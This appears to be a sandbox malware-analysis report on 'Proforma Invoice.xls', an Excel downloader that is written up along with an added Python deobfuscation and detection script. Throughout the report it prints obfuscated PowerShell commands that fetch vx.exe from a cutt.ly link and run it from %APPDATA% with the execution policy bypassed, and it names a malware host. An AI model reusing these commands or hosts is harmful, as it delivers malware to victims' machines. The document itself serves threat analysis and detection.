
Analysis Report Proforma Invoice.xls

Overview

General Information

Sample Name: Proforma Invoice.xls
Analysis ID: 320373
MD5: 55db711144ff4a35faf58d982e7cf727
SHA1: ea7b59dde9f0600915069dec66f8410f25cb66fd
SHA256: 6e76bd502c91158631cadf485ce44caa4d6504864735593fc23d90477a794d17
Tags: netwire, xls


Detection

Hidden Macro 4.0
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Bypasses PowerShell execution policy
Document contains an embedded VBA macro which may execute processes
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Obfuscated command line found
Sigma detected: Microsoft Office Product Spawning Windows Shell
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1916 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • cmd.exe (PID: 1748 cmdline: cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2304 cmdline: powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 1960 cmdline: cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2744 cmdline: powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 1520 cmdline: cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2720 cmdline: powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis; Data: Command: cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe'), CommandLine: cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe'), CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1916, ProcessCommandLine: cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe'), ProcessId: 1748

Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: https://shopphongtinh.com/Ubnccbruoun7.exe; Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: Proforma Invoice.xls; Virustotal: Detection: 14%
Source: Proforma Invoice.xls; ReversingLabs: Detection: 20%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\cmd.exe
Source: global traffic; DNS query: name: cutt.ly
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 104.22.0.232:443
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 104.22.0.232:443
Source: Joe Sandbox View; IP Address: 104.22.0.232
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: powershell.exe, 00000007.00000002.2124637558.000000001CCD0000.00000002.00000001.sdmp; String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000007.00000002.2124228123.000000001B7B0000.00000004.00000001.sdmp; String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown; DNS traffic detected: queries for: cutt.ly
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown | Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49167 -> 443

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0 | Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 0 | Screenshot OCR: Enable Content"
Source: Document image extraction number: 1 | Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 1 | Screenshot OCR: Enable Content"
Document contains an embedded VBA macro which may execute processes
Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function auto_open, API Run("Auto_ouvrir51") | Name: auto_open
Found Excel 4.0 Macro with suspicious formulas
Source: Proforma Invoice.xls | Initial sample: EXEC
Found obfuscated Excel 4.0 Macro
Source: Proforma Invoice.xls | Initial sample: High usage of CHAR() function: 37
Source: Proforma Invoice.xls | OLE, VBA macro line: Sub auto_open()
Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function auto_open | Name: auto_open
Source: Proforma Invoice.xls | OLE indicator, VBA macros: true
Source: powershell.exe, 00000007.00000002.2124637558.000000001CCD0000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal92.expl.evad.winXLS@13/11@2/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\ADEE0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRE55F.tmp
Source: Proforma Invoice.xls | OLE indicator, Workbook stream: true
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Proforma Invoice.xls | Virustotal: Detection: 14%
Source: Proforma Invoice.xls | ReversingLabs: Detection: 20%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000007.00000002.2118121265.0000000002A87000.00000004.00000040.sdmp, powershell.exe, 0000000B.00000002.2162138227.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: tomation.pdb source: powershell.exe, 00000007.00000002.2118121265.0000000002A87000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.2162138227.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: ws\dll\System.pdb1. source: powershell.exe, 00000007.00000002.2118121265.0000000002A87000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000007.00000002.2118121265.0000000002A87000.00000004.00000040.sdmp, powershell.exe, 0000000B.00000002.2162138227.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBB source: powershell.exe, 0000000B.00000002.2162138227.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000007.00000002.2118121265.0000000002A87000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000007.00000002.2118121265.0000000002A87000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb/\_ source: powershell.exe, 00000007.00000002.2118094681.0000000002A84000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000007.00000002.2118121265.0000000002A87000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdbstem.M source: powershell.exe, 00000007.00000002.2118121265.0000000002A87000.00000004.00000040.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdbi source: powershell.exe, 00000007.00000002.2118121265.0000000002A87000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000007.00000002.2118121265.0000000002A87000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000007.00000002.2118121265.0000000002A87000.00000004.00000040.sdmp, powershell.exe, 0000000B.00000002.2162138227.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: :\Windows\mscorlib.pdbe source: powershell.exe, 00000007.00000002.2118121265.0000000002A87000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.2162138227.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000007.00000002.2118121265.0000000002A87000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2118121265.0000000002A87000.00000004.00000040.sdmp, powershell.exe, 0000000B.00000002.2162138227.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2117783774.0000000002880000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2151607450.0000000002CE0000.00000002.00000001.sdmp, powershell.exe, 0000000B.00000002.2167391548.000000001B980000.00000002.00000001.sdmp

Data Obfuscation:

Obfuscated command line found
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_000007FF0027121C pushad ; ret 9_2_000007FF00271281
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe  Process information set: NOOPENFILEERRORBOX  (7 identical occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX  (153 identical occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477  (3 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2724  Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2940  Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2484  Thread sleep time: -922337203685477s >= -30000s
The value 922337203685477 is Int64.MaxValue (9223372036854775807 100 ns ticks) converted to milliseconds, i.e. a TimeSpan.MaxValue wait, which is how an indefinite wait on a handle shows up in the trace. It is the kind of wait that trips the long-sleep signature, but it is not a chosen delay; the deliberate delays in this sample are the Start-Sleep 20 and Start-Sleep 25 calls in the PowerShell command lines listed further down.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 0000000B.00000002.2161490285.00000000003D7000.00000004.00000020.sdmp  Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
(The string is the device path of the analysis VM's VMware virtual SATA CD-ROM, the sort of artefact virtual-machine detection routines look for.)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process token adjusted: Debug  (3 occurrences)

HIPS / PFW / Operating System Protection Evasion:

Bypasses PowerShell execution policy
Source: unknown  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe

The three command lines are the stages of one loader chain, each launched through its own cmd.exe child of EXCEL.EXE: the first fetches vx.exe from the cutt.ly short link with System.Net.WebClient.DownloadFile, the second waits 20 seconds and moves vx.exe into %APPDATA%, and the third waits 25 seconds, changes into %APPDATA% and runs it. The Start-Sleep calls sequence the stages so that the download has completed before the move and the execution; the final stage is the one listed twice above (once with an unknown parent, once from cmd.exe).

The obfuscation lives at the PowerShell level, not the cmd.exe level: backtick escapes are inserted inside bare words (stARt`-slE`Ep is Start-Sleep, nEw-oB`jecT Net.WebcL`IENt is New-Object Net.WebClient, ${enV`:appdata} is $env:appdata), the case is scrambled, and the DownloadFile method name is assembled from two string literals ('Down'+'loadFile') and called through .'Invoke' so that the literal token never appears on the command line. -w 1 is -WindowStyle Hidden (1 is the Hidden value of the WindowStyle enumeration) and -EP bypass is -ExecutionPolicy Bypass, the parameter this signature keys on; only the third stage passes it.
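Added example (not part of the sandbox report): a small triage routine that undoes the three obfuscation tricks used in the command lines above (backtick escapes, ('a'+'b') concatenation, ${var} bracing), then matches detection indicators against the cleaned text and extracts the download URL. The indicator names and the staged-loader rule are hypothetical choices made for this example; the sample input is the report's own three command lines, copied without the cmd.exe wrapper.

```python
import re

# Constructed sample input: the three PowerShell command lines quoted in the
# report above, copied as they appear there (the cmd.exe wrapper is omitted).
SAMPLE_CMDLINES = [
    "powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile')"
    ".'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')",
    "powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'",
    "powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe",
]

# Hypothetical indicator names chosen for this example; each regex runs
# against the deobfuscated command line, case-insensitively.
NORMALIZED_INDICATORS = {
    "hidden_window":           r"-w(?:indowstyle)?\s+(?:1|hidden)\b",
    "execution_policy_bypass": r"-e(?:p|xecutionpolicy)\s+bypass\b",
    "webclient_download":      r"net\.webclient.*downloadfile",
    "sleep_staging":           r"start-sleep\s+\d+",
    "appdata_staging":         r"\$env:appdata",
    "execute_from_appdata":    r"cd\s+\$env:appdata\s*;.*\.[/\\]\S+\.exe",
}

_CONCAT = re.compile(r"\(\s*('[^']*'(?:\s*\+\s*'[^']*')+)\s*\)")   # ('a'+'b')
_BRACED_VAR = re.compile(r"\$\{([^}]+)\}")                         # ${env:x}
_URL = re.compile(r"https?://[^\s'\"()]+")


def deobfuscate(cmd: str) -> str:
    """Undo the three cheap tricks used here: backtick escapes inside bare
    words, ('a'+'b') string concatenation, and ${var} bracing."""
    text = cmd.replace("`", "")
    text = _CONCAT.sub(
        lambda m: "'" + "".join(re.findall(r"'([^']*)'", m.group(1))) + "'", text)
    return _BRACED_VAR.sub(r"$\1", text)


def analyze(cmd: str) -> dict:
    """Return the deobfuscated command, the indicators it triggers and any URLs."""
    norm = deobfuscate(cmd)
    hits = [name for name, pat in NORMALIZED_INDICATORS.items()
            if re.search(pat, norm, re.IGNORECASE)]
    # The obfuscation itself is evidence, so the raw string is checked too.
    if "`" in cmd:
        hits.append("backtick_obfuscation")
    if re.search(r"'\s*\+\s*'", cmd):
        hits.append("string_concat_obfuscation")
    return {"normalized": norm, "indicators": sorted(hits), "urls": _URL.findall(norm)}


def triage(cmdlines) -> dict:
    """Summarize a set of command lines seen from one parent (here: Excel)."""
    results = [analyze(c) for c in cmdlines]
    all_hits = sorted({h for r in results for h in r["indicators"]})
    # download -> sleep/move -> sleep/execute is the staged loader pattern
    staged = ("webclient_download" in all_hits and "sleep_staging" in all_hits
              and "execute_from_appdata" in all_hits)
    return {"stages": results, "indicators": all_hits, "staged_loader": staged}


if __name__ == "__main__":
    summary = triage(SAMPLE_CMDLINES)
    for i, stage in enumerate(summary["stages"], 1):
        print(f"stage {i}: {stage['normalized']}")
        print(f"  indicators: {', '.join(stage['indicators'])}")
        if stage["urls"]:
            print(f"  urls: {stage['urls']}")
    print("staged loader:", summary["staged_loader"])
```

The point of normalizing before matching is that a rule written against the raw text (for example one looking for the token DownloadFile or Start-Sleep) misses all three stages, while the same rule applied to the cleaned form fires on each; the raw text is still worth checking separately, because backticks inside bare words and quoted-string concatenation almost never occur in legitimate administrative command lines.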
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation  (15 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation  (6 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation  (3 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\hh.exe VolumeInformation  (3 occurrences)

Mitre Att&ck Matrix

Techniques the analysis matched, grouped by tactic. The bracketed digits are the counters the report attaches to each technique, reproduced exactly as extracted; matrix cells that carried no counter were not matched and are omitted.

Execution: Command and Scripting Interpreter [11], Scripting [32], Exploitation for Client Execution [13], PowerShell [1]
Privilege Escalation: Process Injection [11]
Defense Evasion: Masquerading [1], Disable or Modify Tools [1], Virtualization/Sandbox Evasion [2], Process Injection [11], Deobfuscate/Decode Files or Information [1], Scripting [32], Obfuscated Files or Information [1]
Discovery: Query Registry [1], Security Software Discovery [1], Virtualization/Sandbox Evasion [2], Process Discovery [1], Remote System Discovery [1], File and Directory Discovery [2], System Information Discovery [12]
Command and Control: Encrypted Channel [2], Non-Application Layer Protocol [1], Application Layer Protocol [2]

No techniques were matched under Initial Access, Persistence, Credential Access, Lateral Movement, Collection, Exfiltration, Network Effects, Remote Service Effects or Impact.

Behavior Graph

Behavior Graph ID: 320373  Sample: Proforma Invoice.xls  Start date: 19/11/2020  Architecture: WINDOWS  Score: 92

Content recoverable from the graph (the rendered graph and its legend are not reproduced):

Root node signatures: Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros); 6 other signatures.
EXCEL.EXE (node counters 85 and 30) started, with signatures: Obfuscated command line found; Document exploit detected (process start blacklist hit).
EXCEL.EXE started three cmd.exe processes; the first of them again carries the signature Obfuscated command line found.
Each cmd.exe started one powershell.exe (node counters 16 and 9 for the first, 7 for each of the other two).
The first powershell.exe connected to cutt.ly (104.22.0.232, port 443, local port 49165, CLOUDFLARENETUS, United States) and to shopphongtinh.com (202.92.6.10, port 443, local ports 49167 and 49168, VNPT-AS-VN VNPT Corp, Viet Nam). cutt.ly is a URL shortener, so the second host is most plausibly the redirect target of the download link in the first command line; the report itself only records that both were contacted by the same process.

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
Proforma Invoice.xls | 14% | Virustotal | | Browse
Proforma Invoice.xls | 21% | ReversingLabs | Document-Word.Downloader.Powdow |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label | Link
cutt.ly | 1% | Virustotal | | Browse
shopphongtinh.com | 5% | Virustotal | | Browse

URLs


Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
